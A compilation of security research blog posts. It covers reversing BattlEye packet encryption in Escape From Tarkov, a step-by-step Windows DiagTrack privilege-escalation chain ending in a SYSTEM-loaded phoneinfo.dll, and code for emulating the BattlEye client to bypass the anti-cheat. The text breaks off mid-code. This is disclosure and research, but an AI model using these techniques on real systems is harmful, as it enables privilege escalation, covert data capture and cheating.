  1. QEMU - a multiplatform emulator (though best on Linux) that provides the best debugging facilities due to being an emulator rather than a VM. It is quite complex to set up, and compared to its counterparts, it is also quite slow.
  2. VirtualBox - a good multiplatform solution, except that it suffers from memory loss due to lackluster non-volatile RAM (NVRAM) emulation.
  3. VMware - offers good performance with correctly working NVRAM emulation. If the guest and host are both Windows, it works very well with WinDbg for debugging the TSL and RT phases.

Final words

In this article we have covered a couple of introductory topics to help you get a basic understanding of what UEFI is. You will probably have some extra questions regarding this topic, and we are more than happy to answer them. Part 2 of this series will be more technical, but we will explain it as thoroughly as we can to make it as simple to follow as possible. We will be providing code for a simple DXE driver built with EDK2, and will show examples of basic console input and output, writing to a serial port, and debugging the driver with QEMU.

Thank you very much for reading this far, and we look forward to continuing this series in the coming weeks!

Cracking BattlEye packet encryption

Recently, Battlestate Games, the developers of Escape From Tarkov, hired BattlEye to implement encryption on networked packets so that cheaters can’t capture these packets, parse them and use them for their advantage in the form of radar cheats, or otherwise. Today we’ll go into detail about how we broke their encryption in a few hours.

Analysis of EFT

We started by analyzing Escape From Tarkov itself. The game uses the Unity engine with C#, which compiles to an intermediate language (IL). This means you can very easily view the code behind the game by opening it in tools like ILDasm or dnSpy. Our tool of choice for this analysis was dnSpy.

When not built with the IL2CPP option, Unity places the game’s managed files under GAME_NAME_Data\Managed, in this case EscapeFromTarkov_Data\Managed. This folder contains all the dependencies that the engine uses, including Assembly-CSharp.dll, the file that contains the game’s code. We loaded this file in dnSpy and searched for the string encryption, which landed us here:

This segment is in a class called EFT.ChannelCombined, which is the class that handles networking as you can tell by the arguments passed to it:

Right clicking on channelCombined.bool_2, which is the variable they log as an indicator for whether encryption was enabled or not, then clicking Analyze, shows us that it’s referenced by 2 methods:

The second of which is the one we’re currently in, so by double clicking on the first one, it lands on this:

Voila! There’s our call into BEClient.EncryptPacket. Clicking on that method takes you to the BEClient class, which we can then dissect to find a method called DecryptServerPacket. This method calls into a function in BEClient_x64.dll called pfnDecryptServerPacket, which decrypts the data into a user-allocated buffer and writes the size of the decrypted buffer into a pointer supplied by the caller.

pfnDecryptServerPacket is not exported by BattlEye, nor is it calculated by EFT; it’s actually supplied by BattlEye’s initializer once called by the game. We managed to calculate the RVA (Relative Virtual Address) by loading BattlEye into a process of our own, and replicating how the game initializes it.
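As a reminder of what the RVA buys us, here is a minimal sketch of the arithmetic involved. The helper names to_rva and from_rva are hypothetical and the addresses in the usage note are made up; the point is only that an RVA is an offset from the module base, so it stays valid wherever the module ends up being loaded.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper: converts an absolute address inside a loaded module
// into an RVA by subtracting the module's base address.
inline std::uint32_t to_rva(std::uint64_t module_base, std::uint64_t address)
{
    assert(address >= module_base && "address must lie inside the module");
    return static_cast<std::uint32_t>(address - module_base);
}

// The inverse: rebases an RVA onto the address the module has in another process.
inline std::uint64_t from_rva(std::uint64_t module_base, std::uint32_t rva)
{
    return module_base + rva;
}
```

For example, a pointer of 0x180001234 obtained in our own process with the module at 0x180000000 gives the RVA 0x1234, which can then be added to the base of the same module inside the game.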

The code for this program is available here.

Analysis of BattlEye

As we’ve deduced from the last section, EFT calls into BattlEye to do all its cryptography needs. So now it’s a matter of reversing native code rather than IL, which is significantly harder.

BattlEye uses a protector called VMProtect, which virtualizes and mutates segments specified by the developer. To properly reverse a binary protected by this obfuscator, you’ll need to unpack it.

Unpacking is as simple as dumping the image at runtime; we did this by loading it into a local process then using Scylla to dump its memory to disk.

Opening this file in IDA, then going to the DecryptServerPacket routine will lead us to a function that looks like this:

This is what’s called a vmentry, which pushes a vmkey on the stack then calls into a vminit which is the handler for the virtual machine.

Here is the tricky part: the instructions in this function are only understandable by the program itself due to them being “virtualized” by VMProtect.

Luckily for us, fellow Secret Club member can1357 made a tool that completely breaks this protection, which you can find at VTIL.

Figuring the algorithm

The file produced by VTIL reduced the function from 12195 instructions down to 265, which simplified the project massively. Some VMProtect routines were present in the disassembly, but these are easily recognized and can be ignored. The encryption begins from here:

Equivalent in pseudo-C:

uint32_t flag_check = *(uint32_t*)(image_base + 0x4f8ac);

if (flag_check != 0x1b)
	goto 0x20e445;
else
	goto 0x20e52b;

VTIL uses its own instruction set; I translated this to pseudo-C to simplify it further.

We analyze this routine by going to 0x20e445, which is a jump to 0x1a0a4a. At the very start of this function, sr12 (a copy of rcx, the first argument in the default x64 calling convention) is stored on the stack at [rsp+0x68], and the xor key is stored at [rsp+0x58].

This routine then jumps to 0x1196fd, which is:

Equivalent in pseudo-C:

uint32_t xor_key_1 = *(uint32_t*)(packet_data + 3) ^ xor_key;
// cast the address to a function pointer first, then call through it
((void(*)(uint8_t*, size_t, uint32_t))0x3dccb7)(packet_data, packet_len, xor_key_1);

Note that rsi is rcx, and sr47 is a copy of rdx. Since this is x64, they are calling 0x3dccb7 with arguments in this order: (rcx, rdx, r8). Luckily for us, vxcallq in VTIL means “call into the function, pause virtual execution, then return into the virtual machine”, so 0x3dccb7 is not a virtualized function!

Going into that function in IDA and pressing F5 will bring up pseudo-code generated by the decompiler:

This code looks incomprehensible with some random inlined assembly that has no meaning at all. Once we nop these instructions out, change some var types, then hit F5 again the code starts to look much better:

This function decrypts the packet in 4-byte blocks non-contiguously starting from the 8th byte using a rolling XOR key.
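To make the shape of such a routine concrete, here is a rough sketch of a rolling XOR over non-contiguous 4-byte blocks. It is not BattlEye’s algorithm: only the block size and the starting position come from the description above, while the stride, the key update rule and the name rolling_xor are assumptions chosen purely for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kFirstBlock = 8; // from the text: starts at the 8th byte (exact offset assumed)
constexpr std::size_t kStride     = 8; // ASSUMPTION: every other 4-byte block is touched

// Applies one direction of the hypothetical rolling XOR in place.
inline void rolling_xor(std::vector<std::uint8_t>& packet, std::uint32_t key, bool decrypt)
{
    static_assert(kStride >= sizeof(std::uint32_t), "blocks must not overlap");
    assert(packet.size() >= kFirstBlock && "packet is shorter than its untouched prefix");

    for (std::size_t off = kFirstBlock; off + sizeof(std::uint32_t) <= packet.size(); off += kStride)
    {
        std::uint32_t in = 0;
        std::memcpy(&in, packet.data() + off, sizeof(in));

        const std::uint32_t out = in ^ key;
        std::memcpy(packet.data() + off, &out, sizeof(out));

        // ASSUMPTION: the key "rolls" by absorbing the ciphertext block,
        // which is the input when decrypting and the output when encrypting.
        key += decrypt ? in : out;
    }
}
```

Because the key only ever depends on ciphertext, running the routine once with decrypt set to false and once with it set to true restores the original buffer, which is the property a scheme of this kind needs.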

Once we continue looking at the assembly we figure that it calls into another routine here:

Equivalent in x64 assembly:

mov t225, dword ptr [rsi+0x3]
mov t231, byte ptr [rbx]
add t231, 0xff ; uhoh, overflow

; the following is pseudo
mov [$flags], t231 u< rbx:8

not t231

movsx t230, t231
mov [$flags+6], t230 == 0
mov [$flags+7], t230 < 0

movsx t234, rbx
mov [$flags+11], t234 < 0
mov t236, t234 < 1
mov t235, [$flags+11] != t236

and [$flags+11], t235

mov rdx, sr46 ; sr46=rdx
mov r9, r8

sbb eax, eax ; eax = eax - eax - CF, so eax is 0 if the CF (carry flag) is clear and -1 if it is set

mov r8, t225
mov t244, rax
and t244, 0x11 ; the sbb above left either -1 or 0 in rax, so t244 is now either 0x11 or 0
shr r8, t244 ; a shift count of 0 leaves the data untouched, otherwise it is shifted to the right by 0x11

mov rcx, rsi
mov [rsp+0x20], r9
mov [rsp+0x28], [rsp+0x68]

call 0x3dce60

Before we continue dissecting the function it calls, we have to come to the conclusion that the shift is meaningless due to the carry flag not being set, resulting in a 0 return value from the sbb instruction, which means we’re on the wrong path.
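The reasoning about the carry flag can be checked with a small model of the three instructions involved. This is a sketch in plain C++ rather than anything taken from the binary; sbb_self and carry_dependent_shift are names made up for this example.

```cpp
#include <cassert>
#include <cstdint>

// Models `sbb eax, eax`: eax - eax - CF, i.e. 0 when CF is clear
// and 0xFFFFFFFF (-1) when CF is set.
inline std::uint32_t sbb_self(bool carry_flag)
{
    return carry_flag ? 0xFFFFFFFFu : 0u;
}

// Models the `and t244, 0x11` / `shr r8, t244` pair from the listing above.
inline std::uint64_t carry_dependent_shift(std::uint64_t value, bool carry_flag)
{
    const std::uint32_t shift = sbb_self(carry_flag) & 0x11u; // either 0x11 or 0
    assert(shift < 64 && "shift count must stay below the operand width");
    return value >> shift;
}
```

With the carry flag clear the mask is zero, the shift count is zero, and the value passes through unchanged, which is why the shift has no effect on this path.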

If we look for references to the first routine 0x1196fd, we’ll see that it’s actually referenced again, this time with a different key!

That means the first key was actually a red herring, and the second key is most likely the correct one. Nice one Bastian!

Now we’ve figured out the real xor key and the arguments to 0x3dce60, which are passed in the order: (rcx, rdx, r8, r9, rsp+0x20, rsp+0x28).

We go to that function in IDA, hit F5 and it’s very readable:

We know the order of the arguments, their type and their meaning; the only thing left is to translate this to actual code, which we’ve done nicely and wrapped into a gist available here.

Synopsis

This encryption wasn’t the hardest to reverse engineer, and our efforts were certainly noticed by BattlEye; after 3 days, the encryption was changed to a TLS-like model, where RSA is used to securely exchange AES keys. This makes MITM without reading process memory for all intents and purposes infeasible.

Windows Telemetry service elevation of privilege

By: Jonas L
1 July 2020 at 23:00

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed its path relative to the system directory, and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
 <Profiles>
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  </SystemCollector>  
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
  </EventCollector>
  <SystemProvider Id="SystemProvider" />
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
   <Collectors>
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    </SystemCollectorId> 
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
     <EventProviders>
      <EventProviderId Value="EventProvider_d1d93ef7" />
     </EventProviders>
    </EventCollectorId>    
   </Collectors>
  </Profile>
 </Profiles>
</WindowsPerformanceRecorder>

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to \..\..\file.txt: (note the trailing colon), which turns the path into:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack\..\..\file.txt:.etl

This results in C:\Windows\Temp\file.txt being used.
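To see why the name collapses this way, here is a minimal sketch of the two steps involved. It is a simplified stand-in written for illustration, not the Windows path parser, and collapse_dot_segments and strip_stream_name are hypothetical helpers. The second step assumes the trailing colon makes NTFS treat the appended .etl as a stream name rather than as part of the filename.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// Resolves "." and ".." segments in a backslash-separated path.
inline std::string collapse_dot_segments(const std::string& path)
{
    std::vector<std::string> parts;
    std::string current;

    auto flush = [&] {
        if (current == "..") {
            assert(parts.size() > 1 && "cannot climb above the drive root");
            parts.pop_back();
        } else if (!current.empty() && current != ".") {
            parts.push_back(current);
        }
        current.clear();
    };

    for (char c : path) {
        if (c == '\\') flush(); else current += c;
    }
    flush();

    std::string out;
    for (std::size_t i = 0; i < parts.size(); ++i) {
        if (i != 0) out += '\\';
        out += parts[i];
    }
    return out;
}

// Drops everything from the first ':' in the final path component onwards,
// i.e. the part assumed to be interpreted as a stream name.
inline std::string strip_stream_name(const std::string& path)
{
    const std::size_t last_sep = path.find_last_of('\\');
    const std::size_t colon = path.find(':', last_sep == std::string::npos ? 0 : last_sep);
    return colon == std::string::npos ? path : path.substr(0, colon);
}
```

Feeding the full path from above through collapse_dot_segments and then strip_stream_name yields C:\Windows\Temp\file.txt.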

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

<EventData>
 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>
</EventData>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security-bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the file’s content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This gives us control over the destination, and such renames are exploitable when the source file was created in a folder that grants non-privileged users write access. The reason is permission inheritance: a file inherits its DACL from the parent directory it is created in, and when the file is later moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32 and somehow get the file moved, we will still have write permission to it. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection are necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If, instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operation’s destination. For instance, setting it to \??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because the destination folder is opened before the rename operation is done, but it is now an object directory, which cannot be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though, as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond, there is a 50% chance of getting the benign directory when the folder check is done and a 50% chance of getting the object directory when the rename happens. That gives a 25% chance for a rename to pass the check but end up as phoneinfo.dll in System32. I try to avoid race conditions if possible, but in this situation there did not appear to be any other way forward, and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames as I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*.
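The benefit of repeating the rename can be put into numbers with a short sketch. It assumes each rename is an independent trial with the 25% success chance estimated above, which is an idealisation of the real race; chance_of_any_success is a name made up for this example.

```cpp
#include <cassert>
#include <cmath>

// Probability that at least one of `attempts` independent trials succeeds,
// given the success probability of a single trial.
inline double chance_of_any_success(double per_attempt, unsigned attempts)
{
    assert(per_attempt >= 0.0 && per_attempt <= 1.0);
    return 1.0 - std::pow(1.0 - per_attempt, static_cast<double>(attempts));
}
```

Under that assumption a single rename succeeds a quarter of the time, ten renames push the chance to roughly 0.94, and a batch of one hundred makes failure vanishingly unlikely.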

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100].etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privilege check, additional command prompts would spawn, since the process that initiates the error reporting also attempts to load phoneinfo.dll.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

BattlEye client emulation

By: vmcall
6 July 2020 at 23:00

The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye.

BattlEye initialisation

BattlEye is dynamically loaded by the respective game on startup to initialize the software service (“BEService”) and kernel driver (“BEDaisy”). These two components are critical in ensuring the integrity of the game, but the most critical component by far is the usermode library (“BEClient”) that the game interacts with directly. This module exports two functions: GetVer and more importantly Init.

The Init routine is what the game will call, but this functionality has never been documented before, as people mostly focus on BEDaisy or their shellcode. Most important routines in BEClient, including Init, are protected and virtualised by VMProtect, which we are able to devirtualise and reverse engineer thanks to vtil by secret club member Can Boluk, but the inner workings of BEClient is a topic for a later part of this series, so here is a quick summary.

Init and its arguments have the following definitions:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data);
  
enum instance_status
{
    NONE,
    NOT_INITIALIZED,
    SUCCESSFULLY_INITIALIZED,
    DESTROYING,
    DESTROYED
};

struct becl_game_data
{
    char*         game_version;
    std::uint32_t address;
    std::uint16_t port;

    // FUNCTIONS
    using print_message_t = void(*)(char* message);
    print_message_t print_message;

    using request_restart_t = void(*)(std::uint32_t reason);
    request_restart_t request_restart;

    using send_packet_t = void(*)(void* packet, std::uint32_t length);
    send_packet_t send_packet;

    using disconnect_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length, char* reason);
    disconnect_peer_t disconnect_peer;
};

struct becl_be_data
{
    using exit_t = bool(*)();
    exit_t exit;

    using run_t = void(*)();
    run_t run;

    using command_t = void(*)(char* command);
    command_t command;

    using received_packet_t = void(*)(std::uint8_t* received_packet, std::uint32_t length);
    received_packet_t received_packet;

    using on_receive_auth_ticket_t = void(*)(std::uint8_t* ticket, std::uint32_t length);
    on_receive_auth_ticket_t on_receive_auth_ticket;

    using add_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    add_peer_t add_peer;

    using remove_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    remove_peer_t remove_peer;
};

As seen, these are quite simple containers for interoperability between the game and BEClient. becl_game_data is defined by the game and contains functions that BEClient needs to call (for example, send_packet) while becl_be_data is defined by BEClient and contains callbacks used by the game after initialisation (for example, received_packet). Note that these two structures slightly differ in some games that have special functionality, such as the recently introduced packet encryption in Escape from Tarkov that we’ve already cracked. Older versions of BattlEye (DayZ, Arma, etc.) use a completely different approach with function pointer swap hooks to intercept traffic communication, and therefore these structures don’t apply.

A simple Init implementation would look like this:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data)
{
    // CACHE RELEVANT FUNCTIONS
    battleye::delegate::o_send_packet    = game_data->send_packet;

    // SETUP CLIENT STRUCTURE
    client_data->exit                   = battleye::delegate::exit;
    client_data->run                    = battleye::delegate::run;
    client_data->command                = battleye::delegate::command;
    client_data->received_packet        = battleye::delegate::received_packet;
    client_data->on_receive_auth_ticket = battleye::delegate::on_receive_auth_ticket;
    client_data->add_peer               = battleye::delegate::add_peer;
    client_data->remove_peer            = battleye::delegate::remove_peer;

    return battleye::instance_status::SUCCESSFULLY_INITIALIZED;
}

This would allow our custom BattlEye client to receive packets sent from the game server’s BEServer module.

Packet handling

The function received_packet is by far the most important routine used by the game, as it handles incoming packets from the BattlEye server component. BattlEye communication is extremely simple compared to how important the integrity of it is. In recent versions of BattlEye, packets follow the same general structure:

#pragma pack(push, 1)
struct be_fragment
{
    std::uint8_t count;
    std::uint8_t index;
};

struct be_packet_header
{
    std::uint8_t id;
    std::uint8_t sequence;
};

struct be_packet : be_packet_header
{
    union 
    {
        be_fragment fragment;

        // DATA STARTS AT body[1] IF PACKET IS FRAGMENTED
        struct
        {
            std::uint8_t no_fragmentation_flag;
            std::uint8_t body[0];
        };
    };
    inline bool fragmented()
    {
        return this->fragment.count != 0x00;
    }
};
#pragma pack(pop)

All packets have an identifier and a sequence number (which is used by the requests/response communication and the heartbeat). Requests and responses have a fragmentation mode which allows BEServer and BEClient to send packets in chunks of 0x400 bytes (seemingly arbitrary) instead of sending one big packet.
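The chunking itself is straightforward, as the following sketch shows. Only the 0x400 chunk size and the count/index pair come from the description above; the fragment structure, the helper names and the choice to report a count of one for small payloads are assumptions made for this example, and the real wire layout may differ (be_packet above treats a count of zero as “not fragmented”).

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

constexpr std::size_t kChunkSize = 0x400; // chunk size quoted in the text

// Hypothetical in-memory view of one fragment.
struct fragment
{
    std::uint8_t count;             // total number of fragments
    std::uint8_t index;             // zero-based position of this fragment
    std::vector<std::uint8_t> data; // at most kChunkSize bytes
};

// Splits a payload into consecutive chunks of at most kChunkSize bytes.
inline std::vector<fragment> split_payload(const std::vector<std::uint8_t>& payload)
{
    const std::size_t count = (payload.size() + kChunkSize - 1) / kChunkSize;
    assert(count <= 0xFF && "fragment count must fit the one-byte field");

    std::vector<fragment> out;
    for (std::size_t i = 0; i < count; ++i)
    {
        const std::size_t begin = i * kChunkSize;
        const std::size_t end   = std::min(begin + kChunkSize, payload.size());
        out.push_back({ static_cast<std::uint8_t>(count),
                        static_cast<std::uint8_t>(i),
                        std::vector<std::uint8_t>(payload.begin() + static_cast<std::ptrdiff_t>(begin),
                                                  payload.begin() + static_cast<std::ptrdiff_t>(end)) });
    }
    return out;
}

// Concatenates fragments that are already ordered by index.
inline std::vector<std::uint8_t> reassemble(const std::vector<fragment>& fragments)
{
    std::vector<std::uint8_t> out;
    for (const auto& f : fragments)
        out.insert(out.end(), f.data.begin(), f.data.end());
    return out;
}
```

A payload of 0x900 bytes, for instance, comes out as three fragments of 0x400, 0x400 and 0x100 bytes, and concatenating them in index order restores the original data.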

In the current iteration of BattlEye, the following packets are used for communication:

INIT (00)

This packet is sent to the BEClient module as soon as the connection with the game server has been established. This packet is only transmitted once, contains no data besides the packet id 00 and the response to this packet is simply 00 05.

START (02)

This packet is sent right after the INIT packets have been exchanged, and contains the server-generated guid of the client. The response to this packet is simply the header: 02 00

REQUEST (04) / RESPONSE (05)

This type of packet is sent from BEServer to BEClient to request (and in rare cases, simply transmit) data, and BEClient will send back data for that request using the RESPONSE packet type.

The first request contains crucial information such as the service and integration versions; not responding to it will get you disconnected by the game server. Afterwards, requests are game-specific.

HEARTBEAT (09)

This type of packet is used by the BEServer module to ensure that the connection hasn’t been dropped. It is sent every 30 seconds using a sequential index, and if the client doesn’t respond with the same packet, the client is disconnected from the game server. This heartbeat packet is only three bytes long, with the sequential index used for synchronization being incremental and therefore easily emulated. An example heartbeat could be: 09 01 00, which is the second heartbeat (sequence starts at zero) transmitted.

Emulation

With this knowledge, it is possible to emulate the entire BattlEye anti-cheat with only two proprietary points of data: the responses for request sequence one and two. These can be intercepted using a tool such as Wireshark and replayed as many times as you want for the respective game, because the packet encryption used by BattlEye is static and contextless.

Emulating the INIT packet is, as stated, simply a matter of responding with the sequence number five:

case battleye::packet_id::INIT:
{
    auto info_packet = battleye::be_packet{};
    info_packet.id       = battleye::packet_id::INIT;
    info_packet.sequence = 0x05;

    battleye::delegate::o_send_packet(&info_packet, sizeof(info_packet));
    break;
}

Emulating the START packet is done by replying with the received packet’s header:

case battleye::packet_id::START:
{
